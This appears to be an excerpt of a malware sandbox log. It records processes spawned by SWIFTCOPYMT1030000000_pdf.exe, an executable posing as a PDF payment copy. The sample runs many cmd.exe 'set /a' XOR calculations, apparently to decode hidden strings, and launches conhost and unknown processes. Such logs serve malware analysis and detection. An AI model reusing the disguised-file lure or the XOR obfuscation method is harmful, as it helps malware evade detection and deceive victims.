          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
